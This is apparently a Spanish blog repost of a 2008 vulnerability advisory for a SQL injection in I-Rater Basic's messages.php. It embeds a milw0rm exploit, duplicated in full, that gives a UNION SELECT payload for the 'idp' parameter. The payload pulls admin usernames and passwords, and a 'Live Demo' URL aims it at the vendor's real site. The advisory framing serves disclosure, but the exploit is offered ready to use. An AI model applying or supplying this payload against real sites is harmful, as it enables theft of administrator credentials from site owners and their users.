Descripción: Una vulnerabilidad de inyección SQL en messages.php en I-Rater Basic permite a atacantes remotos ejecutar consultas SQL arbitrarias a través del parametro IDP.
Publicado antes de: 02/02/2009 - Última modificación: 03/02/2009
Gravedad: Alta
Tipo de Pérdida:
* Protección de seguridad
* Confidencialidad
* Integridad
* Disponibilidad
* Otra protección de seguridad
Enlaces:
* http://www.securityfocus.com/bid/32912
Fuente: BID Nombre: 32912
* http://www.milw0rm.com/exploits/7514
Fuente: MILW0RM Nombre: 7514
* http://secunia.com/advisories/33213
Fuente: SECUNIA Nombre: 33213 [Asesor]
Productos Afectados:
* I-Rater - i-rater_basic - _nil_
#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Script Name: I-Rater Basic
#[!] Home Page: http://www.i-rater.com
#[!] Google_Dork: N/A
###################################################
#[~] Example:
http://localhost/Path/messages.php?idp=[exploit]
#[~]Exploit:
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).
##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################
# milw0rm.com [2008-12-18]
http://alerta-antivirus.inteco.es/seguridad/busca_vulns.php?vervuln=200806017
http://www.milw0rm.com/exploits/7514
Publicado antes de: 02/02/2009 - Última modificación: 03/02/2009
Gravedad: Alta
Tipo de Pérdida:
* Protección de seguridad
* Confidencialidad
* Integridad
* Disponibilidad
* Otra protección de seguridad
Enlaces:
* http://www.securityfocus.com/bid/32912
Fuente: BID Nombre: 32912
* http://www.milw0rm.com/exploits/7514
Fuente: MILW0RM Nombre: 7514
* http://secunia.com/advisories/33213
Fuente: SECUNIA Nombre: 33213 [Asesor]
Productos Afectados:
* I-Rater - i-rater_basic - _nil_
#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Script Name: I-Rater Basic
#[!] Home Page: http://www.i-rater.com
#[!] Google_Dork: N/A
###################################################
#[~] Example:
http://localhost/Path/messages.php?idp=[exploit]
#[~]Exploit:
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).
##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################
# milw0rm.com [2008-12-18]
http://alerta-antivirus.inteco.es/seguridad/busca_vulns.php?vervuln=200806017
http://www.milw0rm.com/exploits/7514
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?